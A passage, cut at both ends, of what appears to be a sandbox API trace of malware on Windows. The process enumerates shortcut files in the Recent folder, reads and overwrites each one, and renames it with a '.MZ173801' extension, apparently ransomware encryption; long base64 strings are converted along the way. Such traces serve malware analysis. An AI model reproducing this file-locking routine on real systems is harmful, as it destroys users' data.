cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0110.369] GetCurrentThreadId () returned 0x1358 [0110.369] GetCurrentThreadId () returned 0x1358 [0110.369] GetCurrentThreadId () returned 0x1358 [0110.369] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\p6BEEl6x9.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\p6beel6x9.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.369] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0110.369] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.369] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x464 [0110.370] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.370] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x464, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x464, lpOverlapped=0x0) returned 1 [0110.371] CloseHandle (hObject=0x3f4) returned 1 [0110.371] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\p6BEEl6x9.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\p6beel6x9.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.372] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x464, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x464, lpOverlapped=0x0) returned 1 [0110.373] CloseHandle (hObject=0x3f4) returned 1 [0110.374] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\p6BEEl6x9.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\p6beel6x9.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\p6BEEl6x9.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\p6beel6x9.lnk.mz173801")) returned 1 [0110.375] GetCurrentThreadId () returned 0x1358 [0110.375] GetCurrentThreadId () returned 0x1358 [0110.375] GetCurrentThreadId () returned 0x1358 [0110.375] GetCurrentThreadId () returned 0x1358 [0110.375] GetCurrentThreadId () returned 0x1358 [0110.375] GetCurrentThreadId () returned 0x1358 [0110.375] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d7838d, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x72d7838d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x72d7838d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4bf, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="peBrvrQ9V.ots.lnk", cAlternateFileName="PEBRVR~1.LNK")) returned 1 [0110.375] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0110.375] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0110.375] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\peBrvrQ9V.ots.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\pebrvrq9v.ots.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d7838d, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x72d7838d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x72d7838d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4bf)) returned 1 [0110.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0110.376] GetCurrentThreadId () returned 0x1358 [0110.376] GetCurrentThreadId () returned 0x1358 [0110.376] GetCurrentThreadId () returned 0x1358 [0110.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0110.377] GetCurrentThreadId () returned 0x1358 [0110.377] GetCurrentThreadId () returned 0x1358 [0110.377] GetCurrentThreadId () returned 0x1358 [0110.377] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\peBrvrQ9V.ots.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\pebrvrq9v.ots.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.377] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0110.377] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.377] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x4bf [0110.377] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.378] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x4bf, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x4bf, lpOverlapped=0x0) returned 1 [0110.379] CloseHandle (hObject=0x3f4) returned 1 [0110.379] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\peBrvrQ9V.ots.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\pebrvrq9v.ots.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.380] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x4bf, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x4bf, lpOverlapped=0x0) returned 1 [0110.381] CloseHandle (hObject=0x3f4) returned 1 [0110.382] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\peBrvrQ9V.ots.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\pebrvrq9v.ots.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\peBrvrQ9V.ots.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\pebrvrq9v.ots.lnk.mz173801")) returned 1 [0110.383] GetCurrentThreadId () returned 0x1358 [0110.383] GetCurrentThreadId () returned 0x1358 [0110.383] GetCurrentThreadId () returned 0x1358 [0110.383] GetCurrentThreadId () returned 0x1358 [0110.383] GetCurrentThreadId () returned 0x1358 [0110.383] GetCurrentThreadId () returned 0x1358 [0110.383] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea7b52c7, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x90d789cb, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x90d789cb, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2f1, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Pictures.lnk", cAlternateFileName="")) returned 1 [0110.383] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0110.383] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0110.383] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Pictures.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\pictures.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea7b52c7, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x90d789cb, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x90d789cb, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2f1)) returned 1 [0110.384] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.384] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0110.384] GetCurrentThreadId () returned 0x1358 [0110.384] GetCurrentThreadId () returned 0x1358 [0110.384] GetCurrentThreadId () returned 0x1358 [0110.384] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 